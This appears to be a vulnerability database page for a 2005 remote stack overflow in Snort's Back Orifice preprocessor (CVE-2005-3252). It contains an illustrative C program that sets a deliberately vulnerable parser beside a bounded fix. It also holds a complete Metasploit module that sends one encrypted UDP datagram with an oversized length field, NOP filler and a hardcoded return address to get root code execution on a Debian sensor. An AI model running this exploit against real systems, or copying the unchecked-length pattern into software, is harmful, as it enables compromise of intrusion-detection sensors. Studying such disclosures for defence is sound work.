Snort Back Orifice Preprocessor Remote Stack Overflow Vulnerability

Vulnerability ID: 1109147  Vulnerability type: Buffer overflow
Published: 2005-10-18  Updated: 2006-08-24
CVE: CVE-2005-3252  CNNVD-ID: CNNVD-200510-133
Platform: Linux  CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/10026
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-133
|Vulnerability details
Snort is the Snort team's network intrusion prevention and detection system. It provides packet sniffing, packet analysis and packet inspection, and many other IDS products embed Snort or its components. Snort's Back Orifice ping preprocessor module contains a buffer overflow that a remote attacker can use to execute arbitrary instructions on the Snort sensor. Snort preprocessors are modular plugins that extend functionality by operating on packets before the detection engine runs. The Back Orifice preprocessor decodes packets to determine whether they contain a Back Orifice ping message. The ping detection code does not adequately limit the amount of data read from the packet into a fixed-length buffer, so the buffer can be overflowed. An attacker can trigger arbitrary code execution on the target system by sending a single crafted UDP datagram. Note that the sensor need not be the datagram's destination: the preprocessor inspects any UDP traffic the sensor sees, so the packet can be addressed to any host and port on the monitored segment, which is why the exploit module below uses an arbitrary default port.
|Exploit
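As an added illustration (not Snort's source and not part of the exploit module on this page), the following C reconstructs the pattern described above: a Back Orifice datagram is XOR-decrypted, using the MSVC rand() keystream that the page's Metasploit module also implements, into a fixed 1024-byte stack buffer for as many bytes as the datagram's own header claims. The vulnerable parser is shown beside a bounded one. The buffer size, function names and return codes are assumptions chosen for the demonstration; bo_build mirrors the module's packet layout (17-byte header, body, then XOR everything with the key 31337), and the sample ping and the 1073-byte datagram with a declared length of 1096 are constructed inputs.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define BO_MAGIC        "*!*QWTY?"
#define BO_HDR_LEN      17          /* magic(8) + length(4) + id(4) + type(1) */
#define BO_PING         0x01
#define BO_DEFAULT_KEY  31337u      /* seed the page's exploit module uses */

static uint32_t bo_state;           /* MSVC rand() LCG state, seeded with the BO key */
static uint8_t bo_keybyte(void)
{
    bo_state = bo_state * 214013u + 2531011u;
    return (uint8_t)(((bo_state >> 16) & 0x7fffu) % 256u);
}

/* XOR n bytes with the keystream; symmetric, so client and sensor share it. */
static void bo_crypt(uint32_t key, const uint8_t *in, uint8_t *out, size_t n)
{
    bo_state = key;
    for (size_t i = 0; i < n; i++)
        out[i] = in[i] ^ bo_keybyte();
}

static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Build an encrypted datagram the way the module does. hdr_len is what goes in the
 * header's length field: a real client writes the true size, the exploit writes 1096. */
size_t bo_build(uint8_t *out, size_t out_cap, uint32_t key, uint32_t hdr_len,
                uint8_t type, const uint8_t *body, size_t body_len)
{
    uint8_t plain[2048];
    size_t total = BO_HDR_LEN + body_len;
    if (total > out_cap || total > sizeof plain) return 0;
    memcpy(plain, BO_MAGIC, 8);
    put_le32(plain + 8, hdr_len);
    put_le32(plain + 12, 0x0defacedu);     /* the id bytes the module sends */
    plain[16] = type;
    memcpy(plain + BO_HDR_LEN, body, body_len);
    bo_crypt(key, plain, out, total);
    return total;
}

/* Vulnerable pattern (illustrative, not Snort's code): after decrypting the header, the
 * loop decrypts as many bytes as the header's length field says into a fixed stack
 * buffer, so a declared length of 1096 writes past plaintext[1024]. Untrusted input here
 * is exactly the bug; the demo below only feeds it a well-formed ping. */
int bo_parse_vulnerable(const uint8_t *pkt, size_t pkt_len, uint32_t key)
{
    uint8_t plaintext[1024];
    uint32_t len;
    if (pkt_len < BO_HDR_LEN) return -1;
    bo_crypt(key, pkt, plaintext, BO_HDR_LEN);
    if (memcmp(plaintext, BO_MAGIC, 8) != 0) return -1;
    len = get_le32(plaintext + 8);
    bo_crypt(key, pkt, plaintext, len);      /* BUG: len is attacker controlled */
    return plaintext[16];
}

/* Bounded version: the declared length must cover the header, not exceed the
 * datagram actually received, and fit the decrypt buffer. */
int bo_parse_hardened(const uint8_t *pkt, size_t pkt_len, uint32_t key)
{
    uint8_t plaintext[1024];
    uint32_t len;
    if (pkt_len < BO_HDR_LEN) return -1;
    bo_crypt(key, pkt, plaintext, BO_HDR_LEN);
    if (memcmp(plaintext, BO_MAGIC, 8) != 0) return -1;
    len = get_le32(plaintext + 8);
    if (len < BO_HDR_LEN || len > pkt_len || len > sizeof plaintext) return -2;
    bo_crypt(key, pkt, plaintext, len);
    return plaintext[16];
}

/* A well-formed ping (constructed): both parsers report type 1. */
int demo_legit_ping(int hardened)
{
    const uint8_t body[] = "ping";
    uint8_t pkt[64];
    size_t n = bo_build(pkt, sizeof pkt, BO_DEFAULT_KEY, BO_HDR_LEN + sizeof body,
                        BO_PING, body, sizeof body);
    return hardened ? bo_parse_hardened(pkt, n, BO_DEFAULT_KEY)
                    : bo_parse_vulnerable(pkt, n, BO_DEFAULT_KEY);
}

/* The module's shape: 1073 bytes on the wire, header claiming 1096. The bounded
 * parser rejects it (-2); the vulnerable one would overflow, so it is not run. */
int demo_crafted_ping(void)
{
    uint8_t body[1073 - BO_HDR_LEN];
    uint8_t pkt[1100];
    size_t n;
    memset(body, 0x90, sizeof body);
    n = bo_build(pkt, sizeof pkt, BO_DEFAULT_KEY, 1096, BO_PING, body, sizeof body);
    return bo_parse_hardened(pkt, n, BO_DEFAULT_KEY);
}
```

The bounded check is the whole fix: the length field is data the attacker wrote, so it can only ever be used after it has been clamped to both the bytes actually received and the size of the buffer being filled. The keystream routine is the same LCG as the module's mrand, which is why a sensor with the default key can decrypt what the module sends.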
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Snort Back Orifice Pre-Processor Remote Exploit',
			'Description'    => %q{
				This module exploits a stack overflow in the Back Orifice pre-processor module
			included with Snort versions 2.4.0, 2.4.1, and 2.4.2 (fixed in 2.4.3). This
			vulnerability could be used to completely compromise a Snort sensor, and would
			typically gain an attacker full root or administrative privileges.
			},
			'Author'         => 'KaiJern Lau <xwings [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-3252'],
					['OSVDB', '20034'],
					['BID', '15131'],
					['URL', 'http://xforce.iss.net/xforce/alerts/id/207'],
				],
			'Payload'        =>
				{
					# The saved return address sits at offset 1069 of the decrypted packet;
					# the 17-byte Back Orifice header occupies the start of that space.
					'Space'    => 1073,
					'BadChars' => "\x00",
				},
			'Targets'        =>
				[
					# Target 0: Debian 3.1 Sarge
					[
						'Debian 3.1 Sarge',
						{
							'Platform' => 'linux',
							'Ret'      => 0xbffff350
						}
					],
				],
			'DefaultTarget' => 0))

		# Any UDP port works, since the preprocessor inspects every UDP datagram
		# the sensor sees; 9080 is just a default.
		register_options(
			[
				Opt::RPORT(9080),
			], self.class)

	end

	# Back Orifice keys its XOR stream with the MSVC rand() LCG. Sensor and client
	# must agree on the seed; 31337 is the key used when no password is configured.
	def msrand(seed)
		@holdrand = seed
	end

	def mrand
		@holdrand = (@holdrand * 214013 + 2531011) & 0xffffffff
		(@holdrand >> 16) & 0x7fff
	end

	# XOR every byte of the datagram with the next keystream byte. The operation
	# is symmetric, so the sensor decrypts with the same routine.
	def bocrypt(data)
		msrand(31337)
		data.unpack('C*').map { |b| (b ^ (mrand % 256)).chr }.join
	end

	def exploit
		connect_udp

		# Back Orifice header: 8-byte magic, little-endian length, 4-byte ID, 1-byte type.
		boheader =
			"*!*QWTY?" +
			[1096].pack('V') +            # declared length, larger than the datagram (thanks Russell Sanford)
			"\xed\xac\xef\x0d" +          # ID
			"\x01"                        # type 1 = PING

		# Encode once so the length used for the filler matches the bytes sent.
		buf = payload.encoded

		# Header + payload + NOP filler fill the first 1069 bytes of the decrypted
		# packet; the four bytes after that overwrite the saved return address.
		filler = make_nops(1069 - (boheader.length + buf.length))

		udp_sock.write(
			bocrypt(boheader + buf + filler + [target.ret].pack('V'))
		)

		handler
		disconnect_udp
	end

end
|References

Source: US-CERT
Name: TA05-291A
Link: http://www.us-cert.gov/cas/techalerts/TA05-291A.html
Source: US-CERT
Name: VU#175500
Link: http://www.kb.cert.org/vuls/id/175500
Source: ISS
Name: 20051018 Snort Back Orifice Parsing Remote Code Execution
Link: http://xforce.iss.net/xforce/alerts/id/207
Source: www130.nortelnetworks.com
Link: http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=363396&RenditionID=
Source: www130.nortelnetworks.com
Link: http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=362187&RenditionID=
Source: www.snort.org
Link: http://www.snort.org/docs/change_logs/2.4.3/Changelog.txt
Source: BID
Name: 15131
Link: http://www.securityfocus.com/bid/15131
Source: OSVDB
Name: 20034
Link: http://www.osvdb.org/20034
Source: VUPEN
Name: ADV-2005-2138
Link: http://www.frsirt.com/english/advisories/2005/2138
Source: SECTRACK
Name: 1015070
Link: http://securitytracker.com/id?1015070
Source: SECUNIA
Name: 17559
Link: http://secunia.com/advisories/17559
Source: SECUNIA
Name: 17255
Link: http://secunia.com/advisories/17255
Source: SECUNIA
Name: 17220